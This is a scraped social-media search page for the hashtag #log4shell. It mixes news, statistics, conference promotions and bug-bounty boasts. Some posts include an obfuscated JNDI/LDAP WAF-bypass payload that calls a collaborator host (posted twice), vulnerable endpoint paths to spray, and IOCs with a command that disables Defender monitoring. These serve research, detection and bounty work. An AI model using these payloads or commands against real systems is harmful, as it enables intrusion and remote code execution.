#log4shell zoekresultaten
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
In Dec 2021, the Log4Shell (CVE-2021-44228) vulnerability in Apache's Log4j shook the tech world, found by Alibaba Cloud's security team. Its ability to let attackers execute arbitrary code underscored the importance of up-to-date software. #Log4Shell
⬇️ Ciberseguridad en entornos cloud ⬇️ - Gestión de logs. - Monitorización. - Atención a nuevas vulnerabilidades como #Log4Shell: ¡Parcheo! - Gestión de privilegios. 💡Descubre más en post del blog de @OVHcloud_ES: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado
It's 2024, and a worrying trend is appearing on the Log4shell dashboard. In December, 25% of downloads of L4J were vulnerable to #log4shell - that number sits at 36% today and has been for a few weeks. We're going backwards.
Watch this video with @TonyatESET and learn not just about the latest trends in #ransomware, but also about new statistics concerning #phishing and why the #Log4Shell vulnerability remains a problem. --------------- #WeLiveSecurity #ESET #WeekinSecurity
UH OH SPICY GOT OFF HIS LAZY ASS AND FINALLY STARTED EDITING! Little sneak peek of the project I have going for YouTube, let me know what you think #infosec #cybersecurity #log4shell #Java #YouTube
Three years after #Log4Shell caused a significant security issue, we still struggle with insecure dependencies and injection problems, join @BrianVerm @vilojona @costlow @FrankDelporte for a lively #Java #OpenJDK and beyond discussion on Foojay! foojay.io/today/foojay-p…
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
🕵️♂️Researchers have observed #Lazarus exploiting the #Log4Shell #RCE #vulnerability (CVE-2021-44228) in #OperationBlacksmith campaign, deploying new #DLang #malware: #NineRAT, #DLRAT, and #BottomLoader. 💡Explore more on SOCRadar’s #APT Profile: socradar.io/apt-profile-wh…
An interesting (yet short) attack path that exploited #log4shell in @VMware #vRealize and harvested an #AWS Access Key to access an @elastic #logstash instance in AWS. This was buried among 1700 hosts, executed by NodeZero with no humans involved @Horizon3ai #Pentesting #infosec
The persistent threat -- why major vulnerabilities like #Log4Shell and #Spring4Shell remain significant and super dangerous, by @brianverm @snyksec, #Java and beyond: foojay.io/today/the-pers… #foojaytip
I used this docker image with Minecraft #Log4shell demonstration during my lectures about #cyberattacks at #gamefair2023 conference. Moreover, for victim machine, I used @ReactOS with #Java and #Minecraft server, it worked fine for proof of concept attack with calc execution.
Two years ago #Log4j (CVE-2021-44228) #vulnerability was present in many products, incl. #Minecraft. Recently, I prepared the #Docker image with vulnerable Minecraft server for demonstration of #Log4shell #exploit during my lectures malwarelab.eu/posts/log4shel… #Education #Java
I have a #Log4Shell payload on my GitHub Profile using a @ThinkstCanary Canary Token. Every once and a while I open my email and get a good chuckle 😂
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
Tomorrow we'll take Indiana's I-80/90 toll route toward Chicago, displaying both the #EICAR #antivirus test string and the #Log4Shell PoC QR code magnets on the vehicle. Watch out, future DFIR aficionados!
Now available for ACM Members: "SecOps Tools and 2021 Security Incidents: Log4Shell Exploit," w/Joseph Khoury. Upon completion of this course, you'll be able to describe the tools used to detect and conduct a #Log4Shell exploit. bit.ly/3KcYhoR
#Log4Shell & #Spring4Shell proved that we need to keep our dependencies up-to-date From package managers to bots that can create changes on repositories, there are many tools. At #GOTOcph @MaritvanDijk77 will talk about keeping your dependencies in check gotocph.com/2023
Two years after security researchers discovered the #Log4Shell vulnerability, roughly 38% of applications still use a vulnerable version of the Apache #Log4j library. veracode.com/blog/research/…
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
#Log4j could have failed many times. But it survived. Not because of money, but because of people. An honest look behind the scenes — from the first line of code to the project’s greatest crisis. Read Christian Grobmeier’s new piece: javapro.io/2025/06/10/the… #Log4Shell @TheASF
Armis reveals 2025’s top supply chain threats: AI-driven slopsquatting attacks, security flaws in AI-generated code, and major software supply chain breaches reshape the global cybersecurity landscape. #Slopsquatting #Log4Shell #VibeCoding ift.tt/NevoE8t
Prevent The Next #Log4Shell-A Call To Action "Open Source Economy is a new nonprofit organization formed by maintainers of several critical Java libraries to build a safer, stronger #Java ecosystem" On IProgrammer➡️ cutt.ly/xrVlMgpp @OS_Economy #jvm #opensdk #oss
Log4Shell was supposed to be a turning point. But nearly 4 years later, funding dropped, gov’t focus shifted, & developers were pulled into AI. New blog: How AI & politics stalled open-source security → bit.ly/3V5oyK5 #CyberSecurity #OpenSource #Log4Shell
„Was, wenn wir im Urlaub gewesen wären?“ #Log4Shell traf 2021 Millionen Systeme – ein paar Freiwillige retteten das Netz. Christian Grobmeiers Rückblick auf 30 Jahre #Log4j zeigt, was #OpenSource leisten kann & dessen Grenzen, wenn Firmen nur konsumieren! javapro.io/de/die-lange-g…
Millions lost. Servers hijacked. All because of overlooked code patterns, you might still have today. @vilojona reveals the unseen traps. Are you truly protected against SQLi, #Log4Shell & deserialization hacks? Decode it here: javapro.io/2025/04/29/top… #DevSecOps #SQLInjection
Your perspective is essential to securing the future of the Java ecosystem. 📢 Anonymized results will be shared publicly. 📌 Follow Open Source Economy to stay in the loop. #Java #OpenSource #Log4Shell #Cybersecurity #FOSS #Sustainability #OpenSSF
Cve-2021-44228: impact en oplossingen voor log4j kwetsbaarheid trendingtech.news/trending-news/… #CVE-2021-44228 #Log4Shell #Apache Log4j 2 #softwarebeveiliging #kwetsbaarheid patchen #Trending #Tech #Nieuws
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
¿Uff, se viene un nuevo #log4shell? Estar atentos a CVE-2022-42889 (CVSS 9.8) redpacketsecurity.com/apache-commons… juejin.cn/post/713027639… cve.report/CVE-2022-42889
I fell in love with #Log4Shell again; 4 P1s in a row. Its a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty
Another Tip: I found this VMWare vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method actually of CVE-2021-22005, however this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty
Ox4Shell - Deobfuscate Log4Shell Payloads With Ease bit.ly/3cnwROs #Deobfuscation #Deobfuscator #Log4Shell #Ox4Shell #Oxeye
🔺 Explotación masiva de VMWare Horizon vía #Log4Shell (CVE-2021-44228) para instalación de Minero. IP atacante: 139.99.241.160 🇦🇺 LDAP: 135.125.146.221:1389 Minero: /150.129.234.203:82/add.bat "Set-MpPreference -DisableRealtimeMonitoring $true" IOCs: github.com/CronUp/Malware…
Finally got my 5 months old #Log4Shell report triaged after a couple of "Need more infos" and "Not applicable", super excited🤪🤪😍😍. #BugBounty
They are pretty cozy! 😄 #log4shell #anniversary
Had some questions about how we got the Log4Shell sweaters that @sethlaw and I wore during yesterday’s @absoluteappsec podcast so: DM @rreichel3 as he is gauging interest for a second run of them.
Today marks the 3-year anniversary of the #Log4Shell PoC going public 🧑🎄 I still remember going to sleep on the 9th with a PoC I couldn’t reproduce, only to wake up the next morning to all hell breaking loose and hundreds of RCEs everywhere. Would love to hear your stories! 💸
I found a multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" are vulnerable to #Log4Shell ( CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: pastebin.com/es3Aidfr #BugBounty
There have been over 840K attacks on companies globally, all exploiting the #Log4j (aka #Log4Shell) vulnerability. Learn more about this vulnerability: blck.by/34mUiTQ
After almost an year +multiple fixes and patches, #Log4Shell vulnerabilities are still being found, I recently found two on a single BB program. Waiting for Program owner's response after triage. So keep looking for #Log4Shell in the sub+domains. #BugBounty #bugbountytips
We identified severe security issues within AWS #Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. bit.ly/3EqPbjd
The exploitation of #Log4Shell hasn’t shown any signs of slowing down as the SonicWall threat research team recorded 557.5 million #exploit attempts from December to June. Get the details in the mid-year update to the 2022 SonicWall Cyber Threat Report. bit.ly/3BsPFnO
Something went wrong.
Something went wrong.
United States Trends
- 1. Westbrook 12.4K posts
- 2. Rickey 1,804 posts
- 3. Kings 142K posts
- 4. Gold Glove 6,859 posts
- 5. Big Balls 13.9K posts
- 6. Maybe in California N/A
- 7. Jay Jones 67.3K posts
- 8. #wednesdaymotivation 8,947 posts
- 9. Veo 3.1 1,983 posts
- 10. Meyers 1,802 posts
- 11. Justice Jackson 7,373 posts
- 12. Voting Rights Act 18.3K posts
- 13. Lavine N/A
- 14. Bessent 75.2K posts
- 15. Sabonis N/A
- 16. Young Republicans 136K posts
- 17. Brodie 4,412 posts
- 18. Summer Walker 4,426 posts
- 19. Noah Brown N/A
- 20. Vision Pro 5,326 posts